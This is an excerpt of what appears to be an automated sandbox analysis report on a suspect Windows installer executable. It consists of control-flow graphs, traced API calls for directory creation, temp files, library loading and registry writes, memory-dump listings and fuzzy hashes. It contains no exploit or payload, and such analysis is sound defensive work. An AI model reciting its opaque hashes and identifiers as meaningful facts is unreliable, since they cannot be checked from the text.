                                                                                                                                      • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
                                                                                                                                      • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll), ref: 0040516F
                                                                                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405195
                                                                                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051AF
                                                                                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 004051BD
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll
                                                                                                                                      • API String ID: 2531174081-2854756067
                                                                                                                                      • Opcode ID: 624fe4a610ab20420a1f4b6733ac8ea3133b8c284db2b2603e432234c565fffb
                                                                                                                                      • Instruction ID: da75402713979d4bf34db42cde910fb2485d85a1008762fbb7bcbbad6d42931f
                                                                                                                                      • Opcode Fuzzy Hash: 624fe4a610ab20420a1f4b6733ac8ea3133b8c284db2b2603e432234c565fffb
                                                                                                                                      • Instruction Fuzzy Hash: BB219A71E00108BADF119FA4CD84ADFBFB9EF05354F04807AF404A6291C6798E419FA8
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 864 4055c7-405612 CreateDirectoryA 865 405614-405616 864->865 866 405618-405625 GetLastError 864->866 867 40563f-405641 865->867 866->867 868 405627-40563b SetFileSecurityA 866->868 868->865 869 40563d GetLastError 868->869 869->867
                                                                                                                                      APIs
                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040560A
                                                                                                                                      • GetLastError.KERNEL32 ref: 0040561E
                                                                                                                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405633
                                                                                                                                      • GetLastError.KERNEL32 ref: 0040563D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ls@$|s@
                                                                                                                                      • API String ID: 3449924974-3105301103
                                                                                                                                      • Opcode ID: 6494dcf4892d125dd91232f43a5d02422eac6eb6da40cea13db3a7c62baa9568
                                                                                                                                      • Instruction ID: d76da5e920ef4cf84c76b5f8b6eadacb43d526ba9f765b2b55af8eda6d007f2e
                                                                                                                                      • Opcode Fuzzy Hash: 6494dcf4892d125dd91232f43a5d02422eac6eb6da40cea13db3a7c62baa9568
                                                                                                                                      • Instruction Fuzzy Hash: 90010871C04219EAEF019BA1CC447EFBBB8EB14355F00853AD905B6290E779A605CFAA
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 870 406304-406324 GetSystemDirectoryA 871 406326 870->871 872 406328-40632a 870->872 871->872 873 40633a-40633c 872->873 874 40632c-406334 872->874 875 40633d-40636f wsprintfA LoadLibraryExA 873->875 874->873 876 406336-406338 874->876 876->875
                                                                                                                                      APIs
                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040631B
                                                                                                                                      • wsprintfA.USER32 ref: 00406354
                                                                                                                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406368
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                      • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                      • API String ID: 2200240437-4240819195
                                                                                                                                      • Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                                                                                                                      • Instruction ID: 15cbb93803340843acffe9ced60e7e2f3372dd006ff9664fb566d465880257e2
                                                                                                                                      • Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                                                                                                                      • Instruction Fuzzy Hash: C8F09C30900116ABDB159768DD0DFFB365CEB08309F14057AB986E11D1D574E9258B99
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 877 402ffb-40300f 878 403011 877->878 879 403018-403020 877->879 878->879 880 403022 879->880 881 403027-40302c 879->881 880->881 882 40303c-403049 call 4031d7 881->882 883 40302e-403037 call 4031ed 881->883 887 40318e 882->887 888 40304f-403053 882->888 883->882 891 403190-403191 887->891 889 403177-403179 888->889 890 403059-403079 GetTickCount call 406497 888->890 892 4031c2-4031c6 889->892 893 40317b-40317e 889->893 901 4031cd 890->901 903 40307f-403087 890->903 895 4031d0-4031d4 891->895 896 403193-403199 892->896 897 4031c8 892->897 898 403180 893->898 899 403183-40318c call 4031d7 893->899 904 40319b 896->904 905 40319e-4031ac call 4031d7 896->905 897->901 898->899 899->887 911 4031ca 899->911 901->895 908 403089 903->908 909 40308c-40309a call 4031d7 903->909 904->905 905->887 913 4031ae-4031ba call 405c1a 905->913 908->909 909->887 916 4030a0-4030a9 909->916 911->901 920 403173-403175 913->920 921 4031bc-4031bf 913->921 917 4030af-4030cc call 4064b7 916->917 923 4030d2-4030e9 GetTickCount 917->923 924 40316f-403171 917->924 920->891 921->892 925 4030eb-4030f3 923->925 926 40312e-403130 923->926 924->891 927 4030f5-4030f9 925->927 928 4030fb-403126 MulDiv wsprintfA call 405101 925->928 929 403132-403136 926->929 930 403163-403167 926->930 927->926 927->928 936 40312b 928->936 933 403138-40313d call 405c1a 929->933 934 40314b-403151 929->934 930->903 931 40316d 930->931 931->901 939 403142-403144 933->939 935 403157-40315b 934->935 935->917 938 403161 935->938 936->926 938->901 939->920 940 403146-403149 939->940 940->935
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CountTick$wsprintf
                                                                                                                                      • String ID: ... %d%%
                                                                                                                                      • API String ID: 551687249-2449383134
                                                                                                                                      • Opcode ID: 28484a559e18d06ed43ef22bfdd21feadbb4bbad1a21b96adf7a711402a84214
                                                                                                                                      • Instruction ID: eed10709806649b2ce9ecdbe6bed08e8f554dc741dea3641cf9b2fc180d08aa2
                                                                                                                                      • Opcode Fuzzy Hash: 28484a559e18d06ed43ef22bfdd21feadbb4bbad1a21b96adf7a711402a84214
                                                                                                                                      • Instruction Fuzzy Hash: A7515E71901219ABDB10EF65D904A9F3BB8AF48756F14413BFD10BB2C0C7789E51CBAA
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 941 405ba2-405bac 942 405bad-405bd8 GetTickCount GetTempFileNameA 941->942 943 405be7-405be9 942->943 944 405bda-405bdc 942->944 946 405be1-405be4 943->946 944->942 945 405bde 944->945 945->946
                                                                                                                                      APIs
                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405BB6
                                                                                                                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405BD0
                                                                                                                                      Strings
                                                                                                                                      • "C:\Users\user\Desktop\MaMsKRmgXZ.exe", xrefs: 00405BA2
                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BA5
                                                                                                                                      • nsa, xrefs: 00405BAD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                      • String ID: "C:\Users\user\Desktop\MaMsKRmgXZ.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                      • API String ID: 1716503409-2316510883
                                                                                                                                      • Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                                                                                                                      • Instruction ID: 2f7af396f84d097035df83fe1d719984909df90e6a6ed76a9758152acb097983
                                                                                                                                      • Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                                                                                                                      • Instruction Fuzzy Hash: B9F082367082086BEB108F5ADC04B9B7BA8DF91750F14803BFA08DA291D6B4B9548B69
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 947 6ec016db-6ec01717 call 6ec01a98 951 6ec01834-6ec01836 947->951 952 6ec0171d-6ec01721 947->952 953 6ec01723-6ec01729 call 6ec022af 952->953 954 6ec0172a-6ec01737 call 6ec022f1 952->954 953->954 959 6ec01767-6ec0176e 954->959 960 6ec01739-6ec0173e 954->960 961 6ec01770-6ec0178c call 6ec024d8 call 6ec01559 call 6ec01266 GlobalFree 959->961 962 6ec0178e-6ec01792 959->962 963 6ec01740-6ec01741 960->963 964 6ec01759-6ec0175c 960->964 985 6ec017e3-6ec017e7 961->985 968 6ec01794-6ec017da call 6ec0156b call 6ec024d8 962->968 969 6ec017dc-6ec017e2 call 6ec024d8 962->969 966 6ec01743-6ec01744 963->966 967 6ec01749-6ec0174a call 6ec02a38 963->967 964->959 970 6ec0175e-6ec0175f call 6ec02cc3 964->970 973 6ec01751-6ec01757 call 6ec026b2 966->973 974 6ec01746-6ec01747 966->974 981 6ec0174f 967->981 968->985 969->985 978 6ec01764 970->978 984 6ec01766 973->984 974->959 974->967 978->984 981->978 984->959 989 6ec01824-6ec0182b 985->989 990 6ec017e9-6ec017f7 call 6ec0249e 985->990 989->951 995 6ec0182d-6ec0182e GlobalFree 989->995 997 6ec017f9-6ec017fc 990->997 998 6ec0180f-6ec01816 990->998 995->951 997->998 999 6ec017fe-6ec01806 997->999 998->989 1000 6ec01818-6ec01823 call 6ec014e2 998->1000 999->998 1001 6ec01808-6ec01809 FreeLibrary 999->1001 1000->989 1001->998
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 6EC01A98: GlobalFree.KERNEL32(?), ref: 6EC01D09
                                                                                                                                        • Part of subcall function 6EC01A98: GlobalFree.KERNEL32(?), ref: 6EC01D0E
                                                                                                                                        • Part of subcall function 6EC01A98: GlobalFree.KERNEL32(?), ref: 6EC01D13
                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6EC01786
                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 6EC01809
                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6EC0182E
                                                                                                                                        • Part of subcall function 6EC022AF: GlobalAlloc.KERNEL32(00000040,?), ref: 6EC022E0
                                                                                                                                        • Part of subcall function 6EC026B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6EC01757,00000000), ref: 6EC02782
                                                                                                                                        • Part of subcall function 6EC0156B: wsprintfA.USER32 ref: 6EC01599
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9908323213.000000006EC01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EC00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9908269121.000000006EC00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9908365679.000000006EC03000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9908406672.000000006EC05000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6ec00000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3962662361-3916222277
                                                                                                                                      • Opcode ID: 498f05af893b4c714da480fd996f62dc26096455c8971bbfab7f8a9cdf499697
                                                                                                                                      • Instruction ID: 557579555372b70d117e0e14758438b6030207782c2842cf607e5701ec57cf5b
                                                                                                                                      • Opcode Fuzzy Hash: 498f05af893b4c714da480fd996f62dc26096455c8971bbfab7f8a9cdf499697
                                                                                                                                      • Instruction Fuzzy Hash: 994191710003059BDF459FEC9994BD6B7ECBF0532CF048969E9159A08AFB778549CBA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1004 401c0a-401c2a call 402b0a * 2 1009 401c36-401c3a 1004->1009 1010 401c2c-401c33 call 402b2c 1004->1010 1012 401c46-401c4c 1009->1012 1013 401c3c-401c43 call 402b2c 1009->1013 1010->1009 1016 401c9a-401cc0 call 402b2c * 2 FindWindowExA 1012->1016 1017 401c4e-401c6a call 402b0a * 2 1012->1017 1013->1012 1027 401cc6 1016->1027 1028 401c8a-401c98 SendMessageA 1017->1028 1029 401c6c-401c88 SendMessageTimeoutA 1017->1029 1030 401cc9-401ccc 1027->1030 1028->1027 1029->1030 1031 401cd2 1030->1031 1032 4029b8-4029c7 1030->1032 1031->1032
                                                                                                                                      APIs
                                                                                                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                                                                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                      • String ID: !
                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                      • Opcode ID: e636c23a318330d9371fb32b1eb0c44089503781878c3c5c4e956135cb08f77e
                                                                                                                                      • Instruction ID: 5540d85999f992b2d0d9c3d63f09df6deeece4c427f082cd61f041684b2cd5b6
                                                                                                                                      • Opcode Fuzzy Hash: e636c23a318330d9371fb32b1eb0c44089503781878c3c5c4e956135cb08f77e
                                                                                                                                      • Instruction Fuzzy Hash: 6E216BB1D48208BEEF06AFB4D98AAAD7FB5EB44304F10447EF501B61D1C7B89640DB18
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000023,00000011,00000002), ref: 00402488
                                                                                                                                      • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000000,00000011,00000002), ref: 004024C5
                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000000,00000011,00000002), ref: 004025A9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseValuelstrlen
                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp
                                                                                                                                      • API String ID: 2655323295-1038464266
                                                                                                                                      • Opcode ID: 644d45e961fb075661f6586c1a8c683fb18e4013c471b180fd38698a93afd6b7
                                                                                                                                      • Instruction ID: 8e9ea0cf859de5a6fe7672b5a81e2234dbec8cc7450cb22075f11fbb1059ccd6
                                                                                                                                      • Opcode Fuzzy Hash: 644d45e961fb075661f6586c1a8c683fb18e4013c471b180fd38698a93afd6b7
                                                                                                                                      • Instruction Fuzzy Hash: 42119072E00218BEEB01AFA58E49EAE7BB8FB48314F20443BF504B71C1C6B85D419B58
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402095
                                                                                                                                        • Part of subcall function 00405101: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
                                                                                                                                        • Part of subcall function 00405101: lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
                                                                                                                                        • Part of subcall function 00405101: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
                                                                                                                                        • Part of subcall function 00405101: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll), ref: 0040516F
                                                                                                                                        • Part of subcall function 00405101: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405195
                                                                                                                                        • Part of subcall function 00405101: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051AF
                                                                                                                                        • Part of subcall function 00405101: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051BD
                                                                                                                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020A5
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040211F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2987980305-0
                                                                                                                                      • Opcode ID: 6e927463b8a72c0dbe1b725f1c041be6a871195800c1405556db6ca052780107
                                                                                                                                      • Instruction ID: 97d835e61fc7e0b97890b4be7664cc53dce4a02014942e479506a03d8351e840
                                                                                                                                      • Opcode Fuzzy Hash: 6e927463b8a72c0dbe1b725f1c041be6a871195800c1405556db6ca052780107
                                                                                                                                      • Instruction Fuzzy Hash: 4521D871A00214BBCF117FA4CE8DAAE79B4AB44319F20413BFA01B62D0C6FD9981D65E
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
